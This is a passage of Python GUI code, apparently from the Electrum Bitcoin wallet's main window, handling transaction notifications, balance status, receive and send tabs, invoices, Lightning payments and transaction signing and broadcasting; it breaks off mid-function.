_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
